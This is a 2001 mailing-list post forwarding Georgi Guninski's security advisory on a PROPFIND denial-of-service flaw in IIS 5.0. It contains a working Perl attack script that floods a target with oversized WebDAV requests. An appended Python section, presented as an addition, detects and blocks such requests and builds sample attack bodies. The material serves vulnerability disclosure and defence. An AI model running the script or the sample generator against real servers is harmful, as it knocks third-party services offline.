From: Steve (steveSECURESOLUTIONS.ORG)
Date: Sun May 06 2001 - 18:24:46 CDT


    As usual, the workaround section, quoted below, is lame and not thought out.
    Disabling WebDav does help, and hopefully there will be a MS patch soon.

    > Workaround: Disabling WebDav extensions may help
    > though I do not recommend using IIS on the Internet.

    Here is his advisory:

    ----------------------------------------------------------------------------
    Georgi Guninski security advisory #44, 2001

    IIS 5.0 PROPFIND DOS #2

    Systems affected:
    IIS 5.0

    Risk: Medium
    Date: 6 May 2001

    Description:

    It is possible to remotely restart all IIS related services using a specially
    crafted request.

    If this request is repeated continuously this seriously affects IIS
    performance.

    Details:

    Basically the problem is very long but valid propfind requests containing
    lots of ":".

    Demonstration:

    --vv9.pl-------------------------------------------------------------------
    #!/usr/bin/perl
    # Usage: vv9.pl <host> <port>
    use strict;
    use warnings;
    use IO::Socket;

    print "Written by Georgi Guninski wait some time\n";
    my $host = $ARGV[0];
    my $port = $ARGV[1];

    sub vv
    {
        my $ll = $_[0];
        my $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp")
            || return;
        my $over = ":" x $ll;     # the ":" is the most important
        my $ch   = pack("C", 65); # just to check whether potential payload is possible - yes
        my $tmp  = $ch x 64;
        $over = $ch x 4 . $over . $tmp;
        my $over1 = ":" x $ll;    # not sure about this

        my $xml = '<?xml version="1.0"?><a:propfind xmlns:a="DAV:" xmlns:u="' . $over1 . ':">';
        $xml .= '<a:prop><a:displayname />' . "<u:$over />" . '</a:prop></a:propfind>' . "\n\n";
        my $l = length($xml);
        my $req = "PROPFIND / HTTP/1.1\nContent-type: text/xml\nHost: $host\nContent-length: $l\n\n$xml\n\n";
        syswrite($socket, $req, length($req));
        print ".";
        my $res;
        $socket->read($res, 200);   # read back whatever the server answers
        print $res if defined $res;
        close $socket;
    }

    vv(59060);
    # this is overflow, repeat several times - 49060 seems the smallest #, may need to change
    sleep(1);
    vv(59060);

    ---------------------------------------------------------------------------

    Workaround: Disabling WebDav extensions may help
    though I do not recommend using IIS on the Internet.

    Vendor status:
    Microsoft was informed on 1 May 2001

    Regards,
    Georgi Guninski
    http://www.guninski.com
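As an added example that is not part of Guninski's advisory or Steve's post, here is a Python request inspector a defender could place in front of a WebDAV endpoint to reject PROPFIND bodies of the shape the advisory describes: oversized, with long runs of ":" in a namespace URI or element name. The thresholds and the sample requests are constructed assumptions, not values from the advisory.

```python
import re

# Thresholds are assumptions for illustration, not figures from the advisory.
MAX_BODY_BYTES = 8192  # a legitimate PROPFIND body is a few hundred bytes
MAX_TOKEN_LEN = 256    # longest namespace URI or element name tolerated
MAX_COLON_RUN = 8      # longest run of ':' tolerated anywhere in the body

_XMLNS_RE = re.compile(r'xmlns(?::[^=\s]+)?\s*=\s*"([^"]*)"')  # xmlns:x="..."
_TAG_RE = re.compile(r'<\s*/?\s*([^\s/>]+)')                    # element names
_COLON_RUN_RE = re.compile(r':{2,}')

def check_propfind_body(body):
    """Return reasons the body matches the oversized-PROPFIND shape; [] means it passes."""
    reasons = []
    if len(body) > MAX_BODY_BYTES:
        reasons.append(f"body too large: {len(body)} bytes")
    text = body.decode("latin-1")  # never raises; one char per byte
    run = max((len(m.group(0)) for m in _COLON_RUN_RE.finditer(text)), default=0)
    if run > MAX_COLON_RUN:
        reasons.append(f"colon run of {run}")
    for label, rx in (("namespace URI", _XMLNS_RE), ("element name", _TAG_RE)):
        longest = max((len(m.group(1)) for m in rx.finditer(text)), default=0)
        if longest > MAX_TOKEN_LEN:
            reasons.append(f"{label} of {longest} chars")
    return reasons

def should_block(raw):
    """Split a raw HTTP request into head and body; only PROPFIND bodies are inspected."""
    head, body = raw, b""
    for sep in (b"\r\n\r\n", b"\n\n"):
        h, found, b = raw.partition(sep)
        if found:
            head, body = h, b
            break
    method = head.split(None, 1)[0].upper() if head.strip() else b""
    if method != b"PROPFIND":
        return False, []
    reasons = check_propfind_body(body)
    return bool(reasons), reasons

# Constructed samples for exercising the filter, not traffic from the advisory.
BENIGN = (b"PROPFIND / HTTP/1.1\r\nHost: example.test\r\n\r\n"
          b'<?xml version="1.0"?><a:propfind xmlns:a="DAV:"><a:prop><a:displayname /></a:prop></a:propfind>')

def long_colon_propfind(n):
    """Body shaped as the advisory describes: namespace URI and element name of n colons."""
    colons = ":" * n
    xml = ('<?xml version="1.0"?><a:propfind xmlns:a="DAV:" xmlns:u="' + colons + ':">'
           '<a:prop><a:displayname /><u:' + colons + ' /></a:prop></a:propfind>')
    return b"PROPFIND / HTTP/1.1\nHost: example.test\n\n" + xml.encode()
```

The same three checks apply equally to a request log replayed offline: a PROPFIND whose Content-Length is far above the norm is the cheapest signal to alert on.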
